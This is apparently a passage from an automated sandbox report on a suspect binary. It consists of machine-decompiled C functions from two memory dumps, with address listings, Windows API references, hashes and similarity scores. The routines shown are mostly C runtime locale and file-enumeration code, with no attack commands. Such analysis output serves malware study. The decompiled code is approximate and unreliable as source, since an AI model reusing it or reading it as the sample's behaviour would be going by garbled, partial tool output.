										_t94 = E0042233F( &(_v604.cFileName),  &_v636,  &_v605, E004222E8(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E004225FD(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E0041CA88(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E0041CA88(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E00414DB0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00422327);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E004225FD( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E0041CA88(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E004225FD(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E0040D3AF(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x00422602
0x00422603
0x00422606
0x00422606
0x00422609
0x00422609
0x0042260b
0x0042260c
0x00422611
0x00422618
0x0042261b
0x00422620
0x00422629
0x0042262a
0x0042262d
0x00422637
0x0042263b
0x0042263d
0x00422651
0x00422651
0x00422654
0x0042265e
0x00422663
0x00422666
0x00422668
0x00000000
0x0042266a
0x0042266a
0x0042266f
0x00422676
0x00422679
0x0042267b
0x0042268c
0x0042268e
0x00422690
0x00422690
0x00422690
0x0042267d
0x0042267e
0x00422683
0x00422686
0x00422695
0x0042269b
0x00000000
0x0042269e
0x0042263f
0x0042263f
0x00422645
0x0042264a
0x0042264d
0x0042264f
0x004226a1
0x004226a3
0x004226a4
0x004226a5
0x004226a6
0x004226a7
0x004226a8
0x004226ad
0x004226b1
0x004226b3
0x004226b9
0x004226c0
0x004226c3
0x004226c6
0x004226c9
0x004226ca
0x004226cb
0x004226ce
0x004226d4
0x004226d6
0x004226d8
0x004226d8
0x004226da
0x004226dc
0x00000000
0x00000000
0x004226de
0x004226e0
0x004226e2
0x004226e4
0x004226ef
0x004226f1
0x004226f3
0x00000000
0x00000000
0x004226f3
0x004226e4
0x00000000
0x004226e0
0x004226f5
0x004226f5
0x004226fb
0x004226fd
0x00422703
0x00422705
0x00422727
0x00422727
0x00422729
0x0042272b
0x00422737
0x00422737
0x0042272d
0x0042272d
0x0042272f
0x00000000
0x00422731
0x00422731
0x00422733
0x00422735
0x00000000
0x00000000
0x00422735
0x0042272f
0x0042273f
0x00422747
0x0042274d
0x0042274e
0x00422750
0x00422758
0x0042275e
0x00422764
0x0042276a
0x0042277e
0x00422783
0x0042278e
0x004227a4
0x004227a6
0x004227a9
0x004227cc
0x004227cc
0x004227ce
0x004227d1
0x004227d7
0x004227d7
0x004227dd
0x004227e3
0x004227e9
0x004227ef
0x004227f5
0x00422816
0x0042281b
0x00422820
0x00422824
0x0042282a
0x0042282d
0x00422840
0x00422840
0x0042284e
0x00422853
0x00422856
0x0042285c
0x0042285e
0x004228bc
0x004228c2
0x004228ca
0x004228cf
0x004228d5
0x004228d6
0x00000000
0x00000000
0x00000000
0x0042282f
0x0042282f
0x00422832
0x00422834
0x00000000
0x00422836
0x00422836
0x00422839
0x00000000
0x0042283b
0x0042283b
0x0042283e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042283e
0x00422839
0x00422834
0x004228d8
0x004228d9
0x00000000
0x00422860
0x00422860
0x00422866
0x0042286e
0x00422873
0x00422873
0x00422882
0x00422882
0x0042288a
0x00422890
0x00422896
0x0042289d
0x004228a0
0x004228a2
0x004228b2
0x004228b7
0x00000000
0x004227ab
0x004227ab
0x004227bc
0x004227bc
0x004228df
0x004228df
0x004228e6
0x004228e7
0x004228ef
0x004228f4
0x004228f5
0x00422707
0x0042270a
0x0042270c
0x00422721
0x00000000
0x0042270e
0x0042270e
0x00422714
0x00422719
0x0042270c
0x004228fa
0x004228fb
0x004228fd
0x00422904
0x00000000
0x00000000
0x00000000
0x0042264f
0x00422622
0x00422624
0x00422625
0x00422627
0x00422627

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df560d31b155b96965ab9f096ebc24eec0ebb41605b21de3ed033ce23982cf55
Instruction ID: cc56c8cc6712ed69efad7db2225ffe7000e1481c24f8a7034a9173e5a848925d
Opcode Fuzzy Hash: df560d31b155b96965ab9f096ebc24eec0ebb41605b21de3ed033ce23982cf55
Instruction Fuzzy Hash: 5641F6B190422CAFCB20DF69DD89AEAB7B8EF45304F5442DEE40DD3211DA789E848F14

Uniqueness

Uniqueness Score: -1.00%

Function 00842864 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df560d31b155b96965ab9f096ebc24eec0ebb41605b21de3ed033ce23982cf55
Instruction ID: 527434d5ea697b24745d13b96b9b2e3b63eacdc7d3dead46d9b69cbb5b3ea602
Opcode Fuzzy Hash: df560d31b155b96965ab9f096ebc24eec0ebb41605b21de3ed033ce23982cf55
Instruction Fuzzy Hash: 2D41A47180421DAEDB24DF69CC89AAEBBB8FF45300F5442E9F45DD3211DA349E858F50

Uniqueness

Uniqueness Score: -1.00%

Function 00425BD5 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00425BD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				signed int _t23;
				signed int _t30;
				signed int _t31;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0x43b054; // 0x41d6575c
				_v8 = _t15 ^ _t50;
				_t32 = E0041B333(__ecx, __edx);
				_t47 =  *(E0041B333(__ecx, __edx) + 0x34c);
				_t49 = E00425CAA(_a4);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E004221B2(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					__eflags = _t23;
					if(_t23 != 0) {
						__eflags = _t41;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t41;
							if( *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
								_t30 = E004221B2(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
								__eflags = _t30;
								if(__eflags == 0) {
									_push(_t47);
									_push(_t30);
									goto L9;
								}
							}
						}
					} else {
						__eflags = _t41;
						if(__eflags != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							__eflags =  *_t47;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							_t31 = E00425E01(__eflags);
							__eflags = _t31;
							if(_t31 != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
					__eflags =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E0040D3AF(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}

0x00425bd5
0x00425be0
0x00425be7
0x00425bf5
0x00425bfd
0x00425c0c
0x00425c18
0x00425c29
0x00425c31
0x00425c42
0x00425c49
0x00425c4c
0x00425c4e
0x00425c59
0x00425c5b
0x00425c5d
0x00425c60
0x00425c6c
0x00425c73
0x00425c75
0x00425c77
0x00425c78
0x00000000
0x00425c78
0x00425c75
0x00425c60
0x00425c50
0x00425c50
0x00425c52
0x00425c86
0x00425c86
0x00425c86
0x00425c89
0x00425c8c
0x00425c54
0x00425c54
0x00425c55
0x00425c79
0x00425c79
0x00425c7a
0x00425c82
0x00425c84
0x00000000
0x00000000
0x00425c84
0x00425c52
0x00425c96
0x00425c96
0x00425c33
0x00425c33
0x00425c35
0x00425c35
0x00425ca7

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

Part of subcall function 0041B333: _free.LIBCMT ref: 0041B395
Part of subcall function 0041B333: _free.LIBCMT ref: 0041B3CB

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00425C29

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: c8e81b8e9290063d3d9db019050d9c25208e3cc2dbcfa47e7a059018329ac10e
Instruction ID: 47fe5c837a624838d5df158e26791ca3fb6741cb20f07ea25698978baa14c41c
Opcode Fuzzy Hash: c8e81b8e9290063d3d9db019050d9c25208e3cc2dbcfa47e7a059018329ac10e
Instruction Fuzzy Hash: 4821D371700616ABEB289B16ED42BBB33A8EF04304B50407FFD01D6241FB78DD448A58

Uniqueness

Uniqueness Score: -1.00%

Function 00845E3C Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B5FC
Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B632

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00845E90

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: c8e81b8e9290063d3d9db019050d9c25208e3cc2dbcfa47e7a059018329ac10e
Instruction ID: 4d00395d784dc6a53f2bb7b35de4c96af43074bb27b10f940ea6b60b8b8cf57b
Opcode Fuzzy Hash: c8e81b8e9290063d3d9db019050d9c25208e3cc2dbcfa47e7a059018329ac10e
Instruction Fuzzy Hash: 0121CF7261460AABDB289B28DC42ABF73ACFF44304F10407AFA01C6142EB34EE04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0042585C Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0042585C(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E0041B333(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E00425956( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E00425982, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x00425869
0x0042586f
0x00425870
0x00425873
0x00425876
0x00425876
0x00425879
0x0042587b
0x00425889
0x0042588f
0x00425892
0x00425895
0x00425895
0x00425898
0x0042589a
0x004258a3
0x004258ae
0x004258b1
0x004258b7
0x004258c2
0x004258c2
0x004258cb
0x004258ce
0x004258d6
0x004258dc
0x004258e0
0x004258e5
0x004258e9
0x004258ee
0x004258f0
0x00000000
0x004258f0
0x004258f6

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

EnumSystemLocalesW.KERNEL32(00425982,00000001,00000000,?,-00000050,?,00425FB0,00000000,?,?,?,00000055,?), ref: 004258CE

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ee5b7f36d0045b4c24df2ee0b138d991e29069d1ec53a33c90d373b9d3cee879
Instruction ID: 4f85337d64ab340b8845c9dade96c902e8458dff991685bf45b2021ee8488f2e
Opcode Fuzzy Hash: ee5b7f36d0045b4c24df2ee0b138d991e29069d1ec53a33c90d373b9d3cee879
Instruction Fuzzy Hash: 77112936700B019FDB18AF39D8916BBB791FF80368B54842EE98647B40D3B5A952C744

Uniqueness

Uniqueness Score: -1.00%

Function 00845AC3 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

EnumSystemLocalesW.KERNEL32(00425982,00000001,00000000,?,-00000050,?,00846217,00000000,?,?,?,00000055,?), ref: 00845B35

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ee5b7f36d0045b4c24df2ee0b138d991e29069d1ec53a33c90d373b9d3cee879
Instruction ID: eff76ad5e66ea6f493b8ffd8833688e38ef057ffec38f8a561bf4f3586594e6f
Opcode Fuzzy Hash: ee5b7f36d0045b4c24df2ee0b138d991e29069d1ec53a33c90d373b9d3cee879
Instruction Fuzzy Hash: 03112937200B099FDB18AF39C8A167EB791FF84328B14442DE98687A41E771A942CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00425E01 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00425E01(void* __eflags, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_t8 = E0041B333(_t15, _t21);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E00425956( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x00425e06
0x00425e09
0x00425e0e
0x00425e11
0x00425e35
0x00425e69
0x00425e69
0x00425e37
0x00425e3a
0x00425e64
0x00425e66
0x00425e42
0x00425e42
0x00425e45
0x00425e48
0x00425e48
0x00425e4b
0x00425e4e
0x00425e62
0x00000000
0x00000000
0x00000000
0x00000000
0x00425e62
0x00425e3a
0x00425e6e

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00425B9E,00000000,00000000,?), ref: 00425E2D

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b49d977f471fc6e65482977e9d6ebb23ce7eea96d9b8306cfa35e9c407fdab42
Instruction ID: 9a74996548393ecf86f34d0f767c284d52eb44fbf426b633f2a0661dd31fbe1e
Opcode Fuzzy Hash: b49d977f471fc6e65482977e9d6ebb23ce7eea96d9b8306cfa35e9c407fdab42
Instruction Fuzzy Hash: 30F0F932700621ABDB285725D8467BB7768DB40794F4A442AEC05A3240DA78FE42C694

Uniqueness

Uniqueness Score: -1.00%

Function 00846068 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00845E05,00000000,00000000,?), ref: 00846094

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b49d977f471fc6e65482977e9d6ebb23ce7eea96d9b8306cfa35e9c407fdab42
Instruction ID: 0e666b245746b123ea77ce1e54ae55f035012dca2f01b1fd4a54c8b0fd5e67ba
Opcode Fuzzy Hash: b49d977f471fc6e65482977e9d6ebb23ce7eea96d9b8306cfa35e9c407fdab42
Instruction Fuzzy Hash: E3F0A432A00929BBDB285B24C846BBA7768FB41754F154929ED06F3180FB74FD52CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 004258F7 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004258F7(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E0041B333(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E00425956( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(E00425BD5, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x00425904
0x0042590a
0x0042590b
0x0042590e
0x00425911
0x00425911
0x00425914
0x00425916
0x00425924
0x00425927
0x0042592a
0x00425935
0x00425935
0x0042593e
0x00425941
0x00425947
0x0042594d
0x0042594f
0x00000000
0x0042594f
0x00425955

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

EnumSystemLocalesW.KERNEL32(00425BD5,00000001,00000000,?,-00000050,?,00425F74,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00425941

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 42a99d26b6ffabed99813d012089352f629530d8fdf06cae30c6b5b0172f336a
Instruction ID: 45861c576b40d54be27cc3b541d2e1f7b511bafc96e321be4533cb7211228f4e
Opcode Fuzzy Hash: 42a99d26b6ffabed99813d012089352f629530d8fdf06cae30c6b5b0172f336a
Instruction Fuzzy Hash: E2F04C72300714AFCB245F35EC8167BBB90EF80378F54802EF94547790C6B59C82CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00845B5E Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

EnumSystemLocalesW.KERNEL32(00425BD5,00000001,00000000,?,-00000050,?,008461DB,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00845BA8

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 42a99d26b6ffabed99813d012089352f629530d8fdf06cae30c6b5b0172f336a
Instruction ID: 34fa592d00da2c49bb4cd2d5b2e3a120bd7d91f48a92e17845997f9bf2595a5a
Opcode Fuzzy Hash: 42a99d26b6ffabed99813d012089352f629530d8fdf06cae30c6b5b0172f336a
Instruction Fuzzy Hash: 15F0C2363007085FDB245F399881A6E7B91FB80778B15846DF9458BA81D7B5AC42C650

Uniqueness

Uniqueness Score: -1.00%

Function 0041CACF Relevance: 1.5, APIs: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0041CACF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x439d00);
				E0040E1D0(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E00417381( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x43cbc0 = E0041620F( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E0041CAC2, 1);
				_t17 =  *0x43b054; // 0x41d6575c
				 *0x43cbc0 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E0041CB3F();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}

0x0041cacf
0x0041cad1
0x0041cad6
0x0041cadb
0x0041cae4
0x0041caea
0x0041cafb
0x0041cb0d
0x0041cb0f
0x0041cb14
0x0041cb19
0x0041cb1c
0x0041cb23
0x0041cb2d
0x0041cb39

APIs

Part of subcall function 00417381: EnterCriticalSection.KERNEL32(-0002A84A,?,00418920,00000000,00439B20,0000000C,004188E7,?,?,0041CA5E,?,?,0041B4D5,00000001,00000364), ref: 00417390

EnumSystemLocalesW.KERNEL32(0041CAC2,00000001,00439D00,0000000C,0041CEED,00000000), ref: 0041CB07

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4aeea3f7d15ad00de9d955c743102aec15452edd7437bf15b7a857632f3a4dc5
Instruction ID: 85d59e7e94c1ce6faab78342c225dd7cd815032ddb7c08276cb9ea7e15a251c9
Opcode Fuzzy Hash: 4aeea3f7d15ad00de9d955c743102aec15452edd7437bf15b7a857632f3a4dc5
Instruction Fuzzy Hash: A5F03C36A44204DFD700EF99E882B9D77B0FB48725F10926BE810AB290DB795941CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0083CD36 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008375E8: RtlEnterCriticalSection.NTDLL(003F5A1D), ref: 008375F7

EnumSystemLocalesW.KERNEL32(0041CAC2,00000001,00439D00,0000000C,0083D154,00000000), ref: 0083CD6E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4aeea3f7d15ad00de9d955c743102aec15452edd7437bf15b7a857632f3a4dc5
Instruction ID: 01f1e3407081724f3689365241fc178cbe7d23a6903f6eb7a7e66f8e758aaa60
Opcode Fuzzy Hash: 4aeea3f7d15ad00de9d955c743102aec15452edd7437bf15b7a857632f3a4dc5
Instruction Fuzzy Hash: 66F0FF76A44204EFD714EF98E842B9D77F0FB85721F10812AF510E72A0D7755944CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00425811 Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

